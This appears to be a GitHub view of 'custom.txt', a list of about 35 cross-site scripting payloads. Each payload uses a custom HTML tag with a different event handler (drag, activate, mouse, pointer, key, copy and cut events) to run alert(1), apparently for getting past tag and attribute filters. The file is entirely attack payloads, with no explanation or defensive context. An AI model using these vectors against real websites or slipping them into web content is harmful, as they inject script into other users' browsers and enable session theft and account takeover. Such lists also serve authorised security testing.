-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathcustom.txt
35 lines (35 loc) · 2.13 KB
/
custom.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
<custom tags draggable="true" ondrag="alert(1)">test</custom tags>
<custom tags draggable="true" ondragend="alert(1)">test</custom tags>
<custom tags draggable="true" ondragenter="alert(1)">test</custom tags>
<custom tags draggable="true" ondragleave="alert(1)">test</custom tags>
<custom tags draggable="true" ondragstart="alert(1)">test</custom tags>
<custom tags id=x tabindex=1 onactivate=alert(1)></custom tags>
<custom tags id=x tabindex=1 onbeforeactivate=alert(1)></custom tags>
<custom tags id=x tabindex=1 onbeforedeactivate=alert(1)></custom tags><input autofocus>
<custom tags id=x tabindex=1 ondeactivate=alert(1)></custom tags><input id=y autofocus>
<custom tags onafterscriptexecute=alert(1)><script>1</script>
<custom tags onbeforescriptexecute=alert(1)><script>1</script>
<custom tags onclick="alert(1)">test</custom tags>
<custom tags oncontextmenu="alert(1)">test</custom tags>
<custom tags oncopy=alert(1) value="XSS" autofocus tabindex=1>test
<custom tags oncut=alert(1) value="XSS" autofocus tabindex=1>test
<custom tags ondblclick="alert(1)" autofocus tabindex=1>test</custom tags>
<custom tags onkeydown="alert(1)" contenteditable>test</custom tags>
<custom tags onkeypress="alert(1)" contenteditable>test</custom tags>
<custom tags onkeyup="alert(1)" contenteditable>test</custom tags>
<custom tags onmousedown="alert(1)">test</custom tags>
<custom tags onmouseenter="alert(1)">test</custom tags>
<custom tags onmouseleave="alert(1)">test</custom tags>
<custom tags onmousemove="alert(1)">test</custom tags>
<custom tags onmouseout="alert(1)">test</custom tags>
<custom tags onmouseover="alert(1)">test</custom tags>
<custom tags onmouseup="alert(1)">test</custom tags>
<custom tags onmousewheel=alert(1)>requires scrolling
<custom tags onpointerdown=alert(1)>XSS</custom tags>
<custom tags onpointerenter=alert(1)>XSS</custom tags>
<custom tags onpointerleave=alert(1)>XSS</custom tags>
<custom tags onpointermove=alert(1)>XSS</custom tags>
<custom tags onpointerout=alert(1)>XSS</custom tags>
<custom tags onpointerover=alert(1)>XSS</custom tags>
<custom tags onpointerrawupdate=alert(1)>XSS</custom tags>
<custom tags onpointerup=alert(1)>XSS</custom tags>